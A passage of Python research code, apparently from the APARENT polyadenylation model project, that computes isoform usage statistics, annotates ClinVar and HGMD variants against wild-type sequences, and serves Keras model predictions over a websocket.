df['pooled_proximal_logodds'] = np.log(df['pooled_proximal_usage'] / (1. - df['pooled_proximal_usage']))
df['mean_proximal_logodds'] = df['proximal_logodds'].apply(lambda t: np.mean(list(t)))
df['median_proximal_logodds'] = df['proximal_logodds'].apply(lambda t: np.median(list(t)))
df['std_proximal_logodds'] = df['proximal_logodds'].apply(lambda t: np.std(list(t)))
df['mean_proximal_avgcut'] = df['proximal_avgcut'].apply(lambda t: np.mean(list(t)))
df['median_proximal_avgcut'] = df['proximal_avgcut'].apply(lambda t: np.median(list(t)))
df['std_proximal_avgcut'] = df['proximal_avgcut'].apply(lambda t: np.std(list(t)))
#Proximal Vs. Distal
df['competing_count'] = df['cuts'].apply(lambda t: tuple([np.sum(x[:prox_cut_start]) for x in t]))
df['pooled_competing_count'] = df['competing_count'].apply(lambda t: np.sum(np.array(list(t))))
df['proximal_vs_distal_usage'] = df.apply(lambda row: tuple([(p + isoform_pseudo_count) / (p + c + d + 2. * isoform_pseudo_count) for p, c, d in zip(list(row['proximal_count']), list(row['competing_count']), list(row['distal_count']))]), axis=1)
df['proximal_vs_distal_logodds'] = df['proximal_vs_distal_usage'].apply(lambda t: tuple([np.log(p / (1. - p)) for p in list(t)]))
df['pooled_proximal_vs_distal_usage'] = (df['pooled_proximal_count'] + pooled_isoform_pseudo_count) / (df['pooled_proximal_count'] + df['pooled_competing_count'] + df['pooled_distal_count'] + 2. * pooled_isoform_pseudo_count)
df['mean_proximal_vs_distal_usage'] = df['proximal_vs_distal_usage'].apply(lambda t: np.mean(list(t)))
df['median_proximal_vs_distal_usage'] = df['proximal_vs_distal_usage'].apply(lambda t: np.median(list(t)))
df['pooled_proximal_vs_distal_logodds'] = np.log(df['pooled_proximal_vs_distal_usage'] / (1. - df['pooled_proximal_vs_distal_usage']))
df['mean_proximal_vs_distal_logodds'] = df['proximal_vs_distal_logodds'].apply(lambda t: np.mean(list(t)))
df['median_proximal_vs_distal_logodds'] = df['proximal_vs_distal_logodds'].apply(lambda t: np.median(list(t)))
print('Dropping intermediate columns...')
if drop_nans == True :
df['pooled_proximal_logodds_is_nan'] = np.isnan(df['pooled_proximal_logodds']) | np.isinf(df['pooled_proximal_logodds'])
df['mean_proximal_logodds_is_nan'] = np.isnan(df['mean_proximal_logodds']) | np.isinf(df['mean_proximal_logodds'])
df['mean_proximal_avgcut_nan'] = np.isnan(df['mean_proximal_avgcut']) | np.isinf(df['mean_proximal_avgcut'])
#df = df.query("pooled_proximal_logodds_is_nan == False and mean_proximal_logodds_is_nan == False").copy()# and mean_proximal_avgcut_nan == False
df = df.query("pooled_proximal_logodds_is_nan == False").copy()# and mean_proximal_avgcut_nan == False
df = df.drop(columns=['pooled_proximal_logodds_is_nan', 'mean_proximal_logodds_is_nan', 'mean_proximal_avgcut_nan'])
df = df.drop(columns=['barcode', 'total_count', 'proximal_count', 'distal_count', 'proximal_usage', 'proximal_logodds', 'proximal_vs_distal_usage', 'proximal_vs_distal_logodds', 'cuts', 'proximal_avgcut'])
df = df.reset_index()
return df
def manual_df_processing(seq_df, clinvar_snv_df) :
#Re-annotate SNV mutations against Clinvar
clinvar_snv_df['master_seq'] = clinvar_snv_df['var'].str.slice(0, 164)
clinvar_snv_df = clinvar_snv_df.set_index('master_seq')
clinvar_snv_df = clinvar_snv_df[['significance', 'clinvar_id', 'observed_usage', 'in_acmg']]
clinvar_snv_df = clinvar_snv_df.rename({'observed_usage' : 'apadb_usage'})
seq_df['significance'] = 'Missing'
seq_df['clinvar_id'] = 'Missing'
seq_df['in_acmg'] = 'No'
seq_df.loc[(seq_df.experiment == 'acmg_apadb') | (seq_df.experiment == 'acmg_polyadb'), 'in_acmg'] = 'Yes'
seq_df['apadb_logodds'] = np.nan
seq_df = seq_df.join(clinvar_snv_df, on='master_seq', how='left', rsuffix='_clinvarcopy').copy()
valid_index = seq_df['clinvar_id_clinvarcopy'].notna()
seq_df.loc[valid_index, 'clinvar_id'] = seq_df.loc[valid_index, 'clinvar_id_clinvarcopy']
seq_df.loc[valid_index, 'significance'] = seq_df.loc[valid_index, 'significance_clinvarcopy']
seq_df.loc[valid_index, 'in_acmg'] = seq_df.loc[valid_index, 'in_acmg_clinvarcopy']
seq_df.loc[valid_index, 'apadb_logodds'] = seq_df.loc[valid_index, 'observed_usage']
seq_df = seq_df.drop(columns=['clinvar_id_clinvarcopy', 'significance_clinvarcopy', 'in_acmg_clinvarcopy', 'observed_usage']).copy()
#Re-map snv variants to wt sequences
def hamming_distance(seq1, seq2) :
dist = 0
for j in range(0, len(seq1)) :
if seq1[j] != seq2[j] :
dist += 1
return dist
wt_dict = {}
for index, row in seq_df.iterrows() :
if row['variant'] == 'wt' :
wt_gene = row['gene']
if 'MAN_' in wt_gene :
wt_gene = wt_gene.replace('MAN_', '')
#wt_gene = wt_gene[:wt_gene.index('.')]
if wt_gene not in wt_dict :
wt_dict[wt_gene] = []
wt_dict[wt_gene].append(row['master_seq'])
#Append special case wt mappings
if 'HBB.2' in wt_dict and 'HBB.3' in wt_dict :
wt_dict['HBB.2'].extend(wt_dict['HBB.3'])
wt_seqs = []
for index, row in seq_df.iterrows() :
wt_seq = row['wt_seq']
if wt_seq == 'Unmapped' and row['gene'] in wt_dict :
if row['variant'] == 'snv' :
for wt_seq_candidate in wt_dict[row['gene']] :
if hamming_distance(row['master_seq'], wt_seq_candidate) == 1 :
wt_seq = wt_seq_candidate
break
elif row['variant'] == 'indel' and len(wt_dict[row['gene']]) == 1 :
if hamming_distance(row['master_seq'][:20], wt_dict[row['gene']][0][:20]) == 0 :
wt_seq = wt_dict[row['gene']][0]
wt_seqs.append(wt_seq)
seq_df['wt_seq'] = wt_seqs
#Map TGTA variants to wt sequence
tgta_wts = list(seq_df.query("experiment == 'tgta' and subexperiment == 'n=0'")['master_seq'].values)
tgta_wts.extend(list(seq_df.loc[(seq_df.master_seq.str.contains('AGAGGATCAATCCCATCAGTGG')) & (seq_df.subexperiment == 'n=1')]['master_seq'].values))
wt_seqs = []
tgta_fixed = []
for index, row in seq_df.iterrows() :
wt_seq = row['wt_seq']
if wt_seq == 'Unmapped' and row['experiment'] == 'tgta' :
min_dist = 30
min_wt_seq = 'Unmapped'
for wt_seq_candidate in tgta_wts :
hamming_dist = hamming_distance(row['master_seq'], wt_seq_candidate)
if hamming_dist < min_dist :
min_dist = hamming_dist
min_wt_seq = wt_seq_candidate
wt_seq = min_wt_seq
wt_seqs.append(wt_seq)
if 'AGAGGATCAATCCCATCAGTGG' in row['master_seq'] :
tgta_fixed.append(True)
else :
tgta_fixed.append(False)
seq_df['wt_seq'] = wt_seqs
seq_df['tgta_fixed'] = tgta_fixed
#Map TGTA mut positions
tgta_pos_1_list = []
tgta_pos_2_list = []
tgta_pos_3_list = []
for index, row in seq_df.iterrows() :
tgta_pos_1 = 0
tgta_pos_2 = 0
tgta_pos_3 = 0
if row['experiment'] == 'tgta' :
tgta_start_pos = 0
if row['subexperiment'] in ['n=1', 'n=2', 'n=3'] :
for j in range(tgta_start_pos, len(row['master_seq']) - 3) :
if row['master_seq'][j:j+4] != row['wt_seq'][j:j+4] and row['master_seq'][j:j+4] == 'TGTA' :
tgta_start_pos = j
break
tgta_pos_1 = tgta_start_pos
if row['subexperiment'] in ['n=2', 'n=3'] :
for j in range(tgta_start_pos + 4, len(row['master_seq']) - 3) :
if row['master_seq'][j:j+4] != row['wt_seq'][j:j+4] and row['master_seq'][j:j+4] == 'TGTA' :
tgta_start_pos = j
break
tgta_pos_2 = tgta_start_pos
tgta_pos_1_list.append(tgta_pos_1)
tgta_pos_2_list.append(tgta_pos_2)
tgta_pos_3_list.append(tgta_pos_3)
seq_df['tgta_pos_1'] = tgta_pos_1_list
seq_df['tgta_pos_2'] = tgta_pos_2_list
seq_df['tgta_pos_3'] = tgta_pos_3_list
return seq_df
#Manually annotate SNVs from HGMD
def manually_annotate_hgmd_variants(seq_df_delta) :
seq_df_delta = seq_df_delta.set_index('master_seq')
#F2.1
seq_df_delta.loc['AACCAATCCCGTGAAAGAATTATTTTTGTGTTTCTAAAACTATGGTTCCCAATAAAAGTGACTCTCAGTGAGCCTCAATGCTCCCAGTGCTATTCATGGGCAGCTCTCTGGGCTCAGGAAGAGCCAGTAATACTACTGGATAAAGAAGACTTAAGAATCCACCA', 'significance'] = 'Undetermined'
seq_df_delta.loc['AACCAATCCCGTGAAAGAATTATTTTTGTGTTTCTAAAACTATGGTTCCCAATAAAAGTGACTCTCAGTGAGCCTCAATGCTCCCAGTGCTATTCATGGGCAGCTCTCTGGGCTCAGGAAGAGCCAGTAATACTACTGGATAAAGAAGACTTAAGAATCCACCA', 'clinvar_id'] = 'c.*96C>T'
seq_df_delta.loc['AACCAATCCCGTGAAAGAATTATTTTTGTGTTTCTAAAACTATGGTTCCCAATAAAAGTGACTCTCAGCGAGCCTCAAAGCTCCCAGTGCTATTCATGGGCAGCTCTCTGGGCTCAGGAAGAGCCAGTAATACTACTGGATAAAGAAGACTTAAGAATCCACCA', 'significance'] = 'Undetermined'
seq_df_delta.loc['AACCAATCCCGTGAAAGAATTATTTTTGTGTTTCTAAAACTATGGTTCCCAATAAAAGTGACTCTCAGCGAGCCTCAAAGCTCCCAGTGCTATTCATGGGCAGCTCTCTGGGCTCAGGAAGAGCCAGTAATACTACTGGATAAAGAAGACTTAAGAATCCACCA', 'clinvar_id'] = 'c.*106T>A'
seq_df_delta.loc['AACCAATCCCGTGAAAGAATTATTTTTGTGTTTCTAAAACTATGGTTCCCAATAAAAGTGACTCTCAGCGAGCCTCAATGTTCCCAGTGCTATTCATGGGCAGCTCTCTGGGCTCAGGAAGAGCCAGTAATACTACTGGATAAAGAAGACTTAAGAATCCACCA', 'significance'] = 'Pathogenic'
seq_df_delta.loc['AACCAATCCCGTGAAAGAATTATTTTTGTGTTTCTAAAACTATGGTTCCCAATAAAAGTGACTCTCAGCGAGCCTCAATGTTCCCAGTGCTATTCATGGGCAGCTCTCTGGGCTCAGGAAGAGCCAGTAATACTACTGGATAAAGAAGACTTAAGAATCCACCA', 'clinvar_id'] = 'c.*108C>T'
#HBA2.2
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTGTGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'significance'] = 'Pathogenic'
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTGTGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'clinvar_id'] = 'c.*104G>T'
#seq_df_delta.loc['CTCCCAAAGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'significance'] = 'Undetermined'
#seq_df_delta.loc['CTCCCAAAGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'clinvar_id'] = 'c.*46C>A'
#seq_df_delta.loc['CTCCCAATGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'significance'] = 'Undetermined'
#seq_df_delta.loc['CTCCCAATGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'clinvar_id'] = 'c.*46C>T'
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGATCTTTGAATAAAGTCTGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'significance'] = 'Undetermined'
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGATCTTTGAATAAAGTCTGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'clinvar_id'] = 'c.*82G>A'
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCCGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'significance'] = 'Conflicting'
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCCGAGTGGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'clinvar_id'] = 'c.*98T>C'
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTAGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'significance'] = 'Conflicting'
seq_df_delta.loc['CTCCCAACGGGCCCTCCTCCCCTCCTTGCACCGGCCCTTCCTGGTCTTTGAATAAAGTCTGAGTAGGCAGCAGCCTGTGTGTGCCTGGGTTCTCTCTATCCCGGAATGTGCCAACAATGGAGGTGTTTACCTGTCTCAGACCAAGGACCTCTCTGCAGCTGCAT', 'clinvar_id'] = 'c.*103G>A'
#PTEN.15
seq_df_delta.loc['ATGTATATACCTTTTTGTGTCAAAAGGACATTTAAAATTCAATTAGGATTAATAAAGATGGCACTTTCCCATTTTATTCCAGTTTTATAAAAAGTGGAGACAGACTGATGTGTATACGTAGGAATTTTTTCCTTTTGTGTTCTGTCACCAACTGAAGTGGCTAA', 'significance'] = 'Likely benign'
seq_df_delta.loc['ATGTATATACCTTTTTGTGTCAAAAGGACATTTAAAATTCAATTAGGATTAATAAAGATGGCACTTTCCCATTTTATTCCAGTTTTATAAAAAGTGGAGACAGACTGATGTGTATACGTAGGAATTTTTTCCTTTTGTGTTCTGTCACCAACTGAAGTGGCTAA', 'clinvar_id'] = 'c.*282G>A'
#PTEN.16
seq_df_delta.loc['TCTGAATTTTTTTTTATCAAGAGGGATAAAACACCATGAAAATAAACTTGAATAAACTGAAAATGGACCTTTTTTTTTCTAATGGCAATAGGACATTGTGTCAGATTACCAGTTATAGGAACAATTCTCTTTTCCTGACCAATCTTGTTTTACCCTATACATCC', 'significance'] = 'Undetermined'
seq_df_delta.loc['TCTGAATTTTTTTTTATCAAGAGGGATAAAACACCATGAAAATAAACTTGAATAAACTGAAAATGGACCTTTTTTTTTCTAATGGCAATAGGACATTGTGTCAGATTACCAGTTATAGGAACAATTCTCTTTTCCTGACCAATCTTGTTTTACCCTATACATCC', 'clinvar_id'] = 'c.*74T>C'
seq_df_delta.loc['TCTGAATTTTTTTTTATCAAGAGGGATAAAACACCATGAAAATAAACTTGAATAAACTGAAAATGGACCTTTTTTTTTTTAAGGGCAATAGGACATTGTGTCAGATTACCAGTTATAGGAACAATTCTCTTTTCCTGACCAATCTTGTTTTACCCTATACATCC', 'significance'] = 'Likely benign'
seq_df_delta.loc['TCTGAATTTTTTTTTATCAAGAGGGATAAAACACCATGAAAATAAACTTGAATAAACTGAAAATGGACCTTTTTTTTTTTAAGGGCAATAGGACATTGTGTCAGATTACCAGTTATAGGAACAATTCTCTTTTCCTGACCAATCTTGTTTTACCCTATACATCC', 'clinvar_id'] = 'c.*78T>G'
seq_df_delta.loc['TCTGAATTTTTTTTTATCAAGAGGGATAAAACACCATGAAAATAAACTTGAATAAACTGAAAATGGACCCTTTTTTTTTTAATGGCAATAGGACATTGTGTCAGATTACCAGTTATAGGAACAATTCTCTTTTCCTGACCAATCTTGTTTTACCCTATACATCC', 'significance'] = 'Undetermined'
seq_df_delta.loc['TCTGAATTTTTTTTTATCAAGAGGGATAAAACACCATGAAAATAAACTTGAATAAACTGAAAATGGACCCTTTTTTTTTTAATGGCAATAGGACATTGTGTCAGATTACCAGTTATAGGAACAATTCTCTTTTCCTGACCAATCTTGTTTTACCCTATACATCC', 'clinvar_id'] = 'c.*65T>C'
#BRCA1.1
seq_df_delta.loc['ACTTGATTGTACAAAATACGTTTTGTAAATGTTGTGCTGTTAACACTGCAAATAATCTTGGTAGCAAACACTTCCACCATGAATGACTGTTCTTGAGACTTAGGCCAGCCGACTTTCTCAGAGCCTTTTCACTGTGCTTCAGTCTCCCACTCTGTAAAATGGGG', 'significance'] = 'Undetermined'
seq_df_delta.loc['ACTTGATTGTACAAAATACGTTTTGTAAATGTTGTGCTGTTAACACTGCAAATAATCTTGGTAGCAAACACTTCCACCATGAATGACTGTTCTTGAGACTTAGGCCAGCCGACTTTCTCAGAGCCTTTTCACTGTGCTTCAGTCTCCCACTCTGTAAAATGGGG', 'clinvar_id'] = 'c.*1363A>T'
#RNU4ATAC.4
seq_df_delta.loc[seq_df_delta.gene == 'RNU4ATAC.4', 'significance'] = 'Pathogenic other'
#HBB.1
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACGTTTATTTTCATTGCAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'significance'] = 'Likely benign'
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACGTTTATTTTCATTGCAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'clinvar_id'] = 'c.*118A>G'
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACATTTATTTTCACTGCAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'significance'] = 'Likely benign'
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACATTTATTTTCACTGCAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'clinvar_id'] = 'c.*129T>C'
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACATTTATTTTCATTGAAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'significance'] = 'Likely benign'
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACATTTATTTTCATTGAAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'clinvar_id'] = 'c.*132C>A'
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACATTTATTTTCATTGTAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'significance'] = 'Undetermined'
seq_df_delta.loc['TACTAAACTGGGGGATATTATGAAGGGCCTTGAGCATCTGGATTCTGCCTAATAAAAAACATTTATTTTCATTGTAATGATGTATTTAAATTATTTCTGAATATTTTACTAAAAAGGGAATGTGGGAGGTCAGTGCATTTAAAACATAAAGAAATGAAGAGCTA', 'clinvar_id'] = 'c.*132C>T'
#ARSA.3
seq_df_delta.loc['GCCTGTGGGGGAGGCTCAGGTGTCTGGAGGGGGTTTGTGCCTGATAACGTAATAACACTAGTGGAGACTTGCAGATGTGACAATTCGTCCAATCCTGGGGTAATGCTGTGTGCTGGTGCCGGTCCCCTGTGGTACGAATGAGGAAACTGAGGTGCAGAGAGGTT', 'significance'] = 'Undetermined'
seq_df_delta.loc['GCCTGTGGGGGAGGCTCAGGTGTCTGGAGGGGGTTTGTGCCTGATAACGTAATAACACTAGTGGAGACTTGCAGATGTGACAATTCGTCCAATCCTGGGGTAATGCTGTGTGCTGGTGCCGGTCCCCTGTGGTACGAATGAGGAAACTGAGGTGCAGAGAGGTT', 'clinvar_id'] = 'c.*103C>T'
seq_df_delta.loc['GCCTGTGGGGGAGGCTCAGGTGTCTGGAGGGGGTTTGTGCCTGATAACGTAATAACACCAGTGGAGACTTGCAGATGTGAGAATTCGTCCAATCCTGGGGTAATGCTGTGTGCTGGTGCCGGTCCCCTGTGGTACGAATGAGGAAACTGAGGTGCAGAGAGGTT', 'significance'] = 'Undetermined'
seq_df_delta.loc['GCCTGTGGGGGAGGCTCAGGTGTCTGGAGGGGGTTTGTGCCTGATAACGTAATAACACCAGTGGAGACTTGCAGATGTGAGAATTCGTCCAATCCTGGGGTAATGCTGTGTGCTGGTGCCGGTCCCCTGTGGTACGAATGAGGAAACTGAGGTGCAGAGAGGTT', 'clinvar_id'] = 'c.*125C>G'
seq_df_delta.loc['GCCTGTGGGGGAGGCTCAGGTGTCTGGAGGGGGTTTGTGCCTGATAACGTAATAACACCAGTGGAGACTTGCAGATGTGACAATTAGTCCAATCCTGGGGTAATGCTGTGTGCTGGTGCCGGTCCCCTGTGGTACGAATGAGGAAACTGAGGTGCAGAGAGGTT', 'significance'] = 'Undetermined'
seq_df_delta.loc['GCCTGTGGGGGAGGCTCAGGTGTCTGGAGGGGGTTTGTGCCTGATAACGTAATAACACCAGTGGAGACTTGCAGATGTGACAATTAGTCCAATCCTGGGGTAATGCTGTGTGCTGGTGCCGGTCCCCTGTGGTACGAATGAGGAAACTGAGGTGCAGAGAGGTT', 'clinvar_id'] = 'c.*130C>A'
return seq_df_delta.reset_index().copy()
```
#### File: web/old_version/aparent_server_websocket.py
```python
from __future__ import print_function
import keras
from keras.models import Sequential, Model, load_model
from keras import backend as K
import tensorflow as tf
import pandas as pd
import os
import sys
import time
import pickle
import numpy as np
import scipy.sparse as sp
import scipy.io as spio
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import isolearn_keras as iso
from aparent_losses import *
from aparent_visualization import *
import websockets
import asyncio
import signal
import logging
logging.getLogger('tensorflow').setLevel(logging.ERROR)
import json
#Load APADB pair data
'''apadb_pair_dict = pickle.load(open('apa_apadb_data.pickle', 'rb'))
apadb_pair_df = apadb_pair_dict['apadb_df']
#Take only pooled datapoints
apadb_pair_df = apadb_pair_df.query("tissue == 'pooled'").copy()
apadb_pair_df['seq_prox'] = apadb_pair_df['wide_seq_ext_prox'].str.slice(175-70, 175-70+205)
apadb_pair_df['seq_dist'] = apadb_pair_df['wide_seq_ext_dist'].str.slice(175-70, 175-70+205)
apadb_pair_df['rel_start_prox'] = apadb_pair_df['rel_start_prox'] #- 105
apadb_pair_df['rel_end_prox'] = apadb_pair_df['rel_end_prox'] + 1#- 105
apadb_pair_df['rel_start_dist'] = apadb_pair_df['rel_start_dist'] #- 105
apadb_pair_df['rel_end_dist'] = apadb_pair_df['rel_end_dist'] + 1#- 105
apadb_pair_df['site_distance'] = np.abs(apadb_pair_df['cut_start_prox'] - apadb_pair_df['cut_start_dist'])
gene_list = sorted(list(apadb_pair_df["gene"].unique()))
gene_id_list = sorted(list(apadb_pair_df["gene_id"].unique()))'''
#Load APADB data
apadb_df = pd.read_csv('leslie_apadb_data_wider_v2.csv', sep=',')
apadb_df['seq'] = apadb_df['wide_seq_ext'].str.slice(175-70, 175-70+205)
def get_start_pos(row) :
if row['strand'] == '+' :
return row['cut_start'] - row['pas_pos'] + 70
else :
return row['pas_pos'] - row['cut_end'] + 76
def get_end_pos(row) :
if row['strand'] == '+' :
return row['cut_end'] - row['pas_pos'] + 70 + 1
else :
return row['pas_pos'] - row['cut_start'] + 76 + 1
apadb_df['rel_start'] = apadb_df.apply(get_start_pos, axis=1)
apadb_df['rel_end'] = apadb_df.apply(get_end_pos, axis=1)
gene_list = sorted(list(apadb_df["gene"].unique()))
gene_id_list = sorted(list(apadb_df["gene_id"].unique()))
#Construct pair-wise APADB data
apadb_df['gene_id_dist'] = apadb_df['gene_id'].apply(lambda x: '.'.join(x.split('.')[:-1]) + '.' + str(int(x.split('.')[-1]) - 1))
df_dist = apadb_df.copy().set_index('gene_id')
dist_columns = [
'sitenum',
'pas',
'seq',
'wide_seq',
'wide_seq_ext',
'site_type',
'pas_pos',
'cut_start',
'cut_end',
'cut_mode',
'mirna',
'count',
'rel_start',
'rel_end'
]
df_dist = df_dist[dist_columns]
apadb_pair_df = apadb_df.join(df_dist, on='gene_id_dist', how='inner', lsuffix='_prox', rsuffix='_dist')
apadb_pair_df['site_distance'] = np.abs(apadb_pair_df['cut_start_prox'] - apadb_pair_df['cut_start_dist'])
pair_gene_list = sorted(list(apadb_pair_df["gene"].unique()))
#Load base APARENT model
save_dir = os.path.join(os.getcwd(), 'saved_models')
model_name = 'aparent_plasmid_iso_cut_distalpas_large_lessdropout_all_libs_no_sampleweights.h5'
model_path = os.path.join(save_dir, model_name)
aparent_model = load_model(model_path)
#Load APADB-tuned APARENT model
save_dir = os.path.join(os.getcwd(), 'saved_models')
model_name = 'aparent_apadb_fitted.h5'
model_path = os.path.join(save_dir, model_name)
apadb_model = load_model(model_path)
#Dummy compile
#opt = keras.optimizers.SGD(lr=0.1)
#model.compile(loss='mean_squared_error', optimizer=opt)
encoder = iso.OneHotEncoder(205)
def aparent_mutmap(seq, iso_start, iso_end) :
cut_ref, _, _ = aparent_predict(seq, iso_start, iso_end)
cut_vars = np.zeros((len(seq), 4, len(seq) + 1))
for mut_pos in range(len(seq)) :
for mut_nt_i, mut_nt in enumerate(['A', 'C', 'G', 'T']) :
var_seq = seq[:mut_pos] + mut_nt + seq[mut_pos+1:]
cut_pred, _, _ = aparent_predict(var_seq, iso_start, iso_end)
cut_vars[mut_pos, mut_nt_i, :] = cut_pred[:]
return cut_ref, cut_vars
def aparent_predict(seq, iso_start, iso_end) :
#Predict iso and cut
one_hot = np.reshape(encoder(seq), (1, 205, 4, 1))
_, cut_pred = aparent_model.predict(x=[one_hot, np.zeros((1, 13)), np.ones((1, 1))])
cut_pred = np.ravel(cut_pred)
iso_pred = np.sum(cut_pred[iso_start: iso_end])
logodds_pred = np.log(iso_pred / (1.0 - iso_pred))
return cut_pred, iso_pred, logodds_pred
def apadb_predict(seq_prox, prox_cut_start, prox_cut_end, seq_dist, dist_cut_start, dist_cut_end, site_distance) :
site_distance = np.log(np.array([site_distance]).reshape(1, -1)) #Site distance in log-space
prox_cut_start = np.array([prox_cut_start]).reshape(1, -1)
prox_cut_end = np.array([prox_cut_end]).reshape(1, -1)
dist_cut_start = np.array([dist_cut_start]).reshape(1, -1)
dist_cut_end = np.array([dist_cut_end]).reshape(1, -1)
onehot_prox = np.reshape(encoder(seq_prox), (1, len(seq_prox), 4, 1))
onehot_dist = np.reshape(encoder(seq_dist), (1, len(seq_dist), 4, 1))
#Predict with APADB-tuned APARENT model
iso_pred, cut_prox, cut_dist = apadb_model.predict(x=[onehot_prox, onehot_dist, prox_cut_start, prox_cut_end, dist_cut_start, dist_cut_end, site_distance, np.zeros((1, 13)), np.ones((1, 1))])
return iso_pred[0, 0], np.ravel(cut_prox), np.ravel(cut_dist)
async def hello(websocket, path):
message = ''
while message != 'exit' :
message = await websocket.recv()
print(f"< {message}")
return_json = ''
if 'aparent_' in message :
_, seq, cut_start, cut_end = message.split("_")
cut_start, cut_end = int(cut_start), int(cut_end)
cut_pred, _, _ = aparent_predict(seq, cut_start, cut_end)
return_json = json.dumps(
{
"return_action" : "aparent",
#"cut_pred": str(["{:.6f}".format(cut) for cut in cut_pred.tolist()])
"cut_pred": [round(cut, 6) for cut in cut_pred.tolist()]
}
)
elif 'variant_' in message :
_, ref_seq, var_seq, cut_start, cut_end = message.split("_")
cut_start, cut_end = int(cut_start), int(cut_end)
cut_ref, _, _ = aparent_predict(ref_seq, cut_start, cut_end)
cut_var, _, _ = aparent_predict(var_seq, cut_start, cut_end)
return_json = json.dumps(
{
"return_action" : "variant",
"cut_ref": [round(cut, 6) for cut in cut_ref.tolist()],
"cut_var": [round(cut, 6) for cut in cut_var.tolist()]
}
)
elif 'mutmap_' in message :
_, ref_seq, cut_start, cut_end = message.split("_")
cut_start, cut_end = int(cut_start), int(cut_end)
cut_ref, cut_vars = aparent_mutmap(ref_seq, cut_start, cut_end)
return_json = json.dumps(
{
"return_action" : "mutmap",
"cut_ref": [round(cut, 6) for cut in cut_ref.tolist()],
